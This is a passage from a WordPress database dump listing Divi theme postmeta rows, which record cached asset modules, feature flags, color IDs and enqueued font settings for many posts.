link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33483,1050,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33475,1103,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33476,1074,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33477,1074,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33478,1074,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33472,1103,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33473,1103,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33474,1103,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33468,1119,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33469,1119,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33470,1119,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33471,1119,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33466,1228,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33467,1228,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33461,1334,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33462,1334,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33463,1334,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33464,1228,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33465,1228,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33456,1341,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33457,1341,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33458,1341,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33459,1341,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33460,1334,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33452,1423,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33453,1423,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33454,1423,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33455,1423,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33442,840,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33443,840,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33444,1582,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33445,1582,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33446,1582,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33447,1582,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33448,1496,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33449,1496,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33450,1496,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33451,1496,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33436,517,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33437,517,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33438,517,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33439,517,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33440,840,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33441,840,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33432,565,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33433,565,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33434,565,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33435,565,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33428,931,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33429,931,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33430,931,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33431,931,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33423,601,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33424,1257,'_divi_